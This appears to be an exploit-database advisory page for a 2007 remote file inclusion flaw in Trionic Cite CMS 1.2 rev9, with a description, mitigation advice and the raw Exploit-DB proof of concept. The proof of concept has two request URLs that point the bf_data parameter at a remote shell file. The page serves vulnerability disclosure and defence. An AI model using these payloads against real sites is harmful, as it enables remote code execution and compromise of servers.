header-logo
Suggest Exploit
vendor:
Cite CMS
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Cite CMS
Affected Version From: 1.2 rev9
Affected Version To: 1.2 rev9
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Trionic Cite CMS 1.2 rev9 Remote File Inclusion Vulnerabilities

The Trionic Cite CMS 1.2 rev9 is vulnerable to remote file inclusion attacks. An attacker can exploit this vulnerability by manipulating the 'bf_data' parameter in the '/interface/editors/-custom.php' and '/interface/editors/custom.php' scripts to include malicious files from a remote server. This can lead to arbitrary code execution on the affected system.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the Trionic Cite CMS or apply any available security patches provided by the vendor. Additionally, it is advised to implement proper input validation and sanitization techniques to prevent remote file inclusion attacks.
Source

Exploit-DB raw data:

# Trionic Cite CMS 1.2 rev9 Remote File Inclusion Vulnerabilities
# D.S : http://sourceforge.net/project/showfiles.php?group_id=177347
# POC :
# /[PHAT]/interface/editors/-custom.php?bField[bf_data]=http://localhost/shell.txt
# /[PHAT]/interface/editors/custom.php?bField[bf_data]=http://localhost/shell.txt

# milw0rm.com [2007-10-05]

Navigation

Suggest Exploit

Services By CQR